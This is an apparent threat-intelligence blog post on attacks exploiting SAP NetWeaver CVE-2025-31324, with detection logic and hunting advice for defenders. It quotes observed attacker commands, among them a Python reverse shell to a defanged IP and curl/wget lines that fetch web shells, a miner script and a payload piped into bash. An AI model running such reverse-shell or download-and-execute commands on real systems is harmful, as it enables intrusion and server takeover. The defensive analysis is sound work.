Red Canary has observed activity exploiting a newly documented unrestricted file upload vulnerability in SAP NetWeaver Visual Composer, software used to develop enterprise applications for business analysts. CVE-2025-31324 has received a critical CVSS rating of 10.0, and we encourage patching immediately.
Red Canary Co-Founder Keith McCammon broke down Red Canary’s visibility into this exploitation in the April 29 episode of Office Hours:
What is CVE-2025-31324?
This vulnerability allows for unrestricted file uploads into a SAP NetWeaver server. By exploiting this vulnerability, an adversary may upload web shells and other arbitrary content to execute on the SAP NetWeaver server. SAP released a security advisory visible to customers of their support portal with additional guidance to patch affected components.
In addition, other security vendors have reported widespread exploitation:
- ReliaQuest Uncovers New Critical Vulnerability in SAP NetWeaver
- Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324 | Rapid7 Blog
- Active Exploitation of SAP CVE-2025-31324 Zero-Day | Onapsis
The vulnerability affects instances of SAP with NetWeaver 7.xx installed, including the service packs for that product.
Exploitation behavior
Public exploitation details are available for this vulnerability, and we are actively monitoring sources for additional information. Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited, and that approach has identified instances of SAP NetWeaver exploitation in customer environments.
In one instance of exploitation, Red Canary observed Python reverse shell code spawning from known SAP processes:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((5.161.153[.]112,8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/bin/sh,-i]);
In other instances of exploitation, we observed the manipulation of web shell files followed by the download and execution of additional tools:
mv ../apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp ../apps/sap.com/irj/servlet_jsp/irj/root/usage.jsp
wget hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk -O /tmp/1 || curl -o /tmp/1 hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
wget hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX -O /tmp/1 || curl -o /tmp/1 hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
(curl -sk hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh
curl -O hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
curl -o /usr/sap/…/servlet_jsp/_default/root/forwardsap.jsp hxxps[://]devocional[.]click/download/forwardsap.jsp
curl hxxp[://]temp[.]sh/vvgtW/webhelper -o webhelp.jsp
curl hxxp[://]update.zoho-software[.]com:443/webhelper -o /usr/sap/…/servlet_jsp/irj/root/.webhelper.jsp
In these cases, the adversary also employed Base64 encoding of the commands to evade casual observation with process monitoring tools.
Detection opportunities
The following trio of detection opportunities is a good starting point for security teams developing detection coverage for the behaviors we have observed after exploitation of SAP NetWeaver:
Base64-encoded commands in shell processes
This detector looks for adversaries leveraging encoded commands in Linux shell processes to download remotely hosted files.
process == ('bash')
&&
command_includes ('base64', '-d')
Curl downloading files in /tmp
This detection opportunity looks for adversaries leveraging curl to download files from a remote host into the /tmp folder.
process == ('curl')
&&
wrote/modified_executable
&&
command_includes ('/tmp')
Python scripts establishing a socket to a remote host
This pseudo-detector looks for adversaries using Python scripts to establish a socket to a remote host.
process == ('python')
&&
command_includes (' -c ' || '.socket')
&&
command_includes ('.call(' || '.spawn(')
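As an added example (not Red Canary's detection engine or its analytics), the three pseudo-detectors above expressed as plain Python over a process-event record; the event schema (process name, full command line, a wrote_executable flag) and the sample telemetry are assumptions constructed for this illustration:

```python
import re

# Added example: the three pseudo-detectors above as plain Python.
# The event schema (process, cmdline, wrote_executable) is an assumption.
def detect_base64_shell(process, cmdline):
    """bash decoding a base64 blob on its command line (base64 -d)."""
    return process == "bash" and re.search(r"base64\s+-d\b", cmdline) is not None

def detect_curl_tmp(process, cmdline, wrote_executable):
    """curl that wrote an executable file and names /tmp on its command line."""
    return process == "curl" and wrote_executable and "/tmp" in cmdline

def detect_python_socket(process, cmdline):
    """Inline Python (-c) or socket use, combined with spawning a child."""
    return (process.startswith("python")
            and (" -c " in cmdline or ".socket" in cmdline)
            and (".call(" in cmdline or ".spawn(" in cmdline))

def evaluate(event):
    """Names of the detectors that fire on one process event."""
    proc, cmd = event["process"], event["cmdline"]
    hits = []
    if detect_base64_shell(proc, cmd):
        hits.append("base64_shell")
    if detect_curl_tmp(proc, cmd, event.get("wrote_executable", False)):
        hits.append("curl_tmp")
    if detect_python_socket(proc, cmd):
        hits.append("python_socket")
    return hits

# Constructed sample telemetry modelled on the activity described above;
# hosts are documentation addresses, payloads are elided.
SAMPLE_EVENTS = [
    {"process": "bash", "cmdline": "bash -c 'echo Y3VybCAuLi4= | base64 -d | sh'"},
    {"process": "curl", "cmdline": "curl -o /tmp/1 http://203.0.113.10/stage",
     "wrote_executable": True},
    {"process": "python3", "cmdline":
     "python3 -c 'import socket,subprocess; ...; subprocess.call([\"/bin/sh\",\"-i\"])'"},
    {"process": "curl", "cmdline": "curl -s https://portal.example/irj/portal",
     "wrote_executable": False},
    {"process": "bash", "cmdline": "bash -c 'ls -la /tmp'"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(evaluate(ev) or "-", ev["cmdline"])
```

The base64 check is slightly stricter than the pseudo-detector (it requires `-d` to follow `base64`), which trims false positives from unrelated `-d` flags.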
Along with patching, we recommend examining SAP web server access logs for additional evidence of CVE-2025-31324 exploitation, specifically looking for unusual requests to the API endpoint /developmentserver/metadatauploader. If possible, consider disallowing access to that API endpoint from external networks. To hunt for additional evidence of web shell uploads, organizations can search for unexpected JSP files within these folders on SAP servers:
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
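An added hunting helper for the two checks just described (access-log requests to /developmentserver/metadatauploader, and unexpected JSP files in the three folders), not Red Canary's or SAP's own tooling; it assumes a combined-format access log and the Linux forward-slash layout of those folders under an instance path, and the log lines, file list and known-good baseline are constructed:

```python
import re

# Added hunting helper, not Red Canary's or SAP's tooling. Assumes a
# combined-format access log and the Linux layout of the folders listed
# above; every sample value below is constructed.
ENDPOINT = "/developmentserver/metadatauploader"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

def find_uploader_requests(lines):
    """(client, timestamp, method, status) for each request to ENDPOINT."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it, do not abort the hunt
        client, ts, method, path, status, _size = m.groups()
        if path.split("?", 1)[0].lower() == ENDPOINT:
            hits.append((client, ts, method, int(status)))
    return hits

# The three web shell drop folders from the text, as Linux paths.
WEBSHELL_DIRS = ("j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root",
                 "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work",
                 "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync")

def unexpected_jsp(paths, known_good):
    """Flag .jsp files in those folders that are hidden (dotfiles) or not
    in a known-good baseline taken from a clean install."""
    flagged = []
    for raw in paths:
        directory, _, name = raw.replace("\\", "/").rpartition("/")
        if not name.lower().endswith(".jsp"):
            continue
        if not any(directory.endswith(d) for d in WEBSHELL_DIRS):
            continue
        if name.startswith(".") or name not in known_good:
            flagged.append(raw)
    return flagged

# Constructed samples; SID/instance path are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Apr/2025:10:01:13 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512',
    '198.51.100.2 - - [24/Apr/2025:10:01:20 +0000] "GET /irj/portal HTTP/1.1" 200 2048',
]
ROOT = "/usr/sap/SID/J00/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj"
SAMPLE_FILES = [ROOT + "/root/index.jsp", ROOT + "/root/usage.jsp",
                ROOT + "/work/.webhelper.jsp", ROOT + "/root/logo.png",
                ROOT + "/other/usage.jsp"]
KNOWN_GOOD = {"index.jsp"}
```

In practice feed `unexpected_jsp` the output of a `find` over the instance directory and build `KNOWN_GOOD` from a known-clean system of the same patch level, since the baseline is what separates a legitimate JSP from a dropped one.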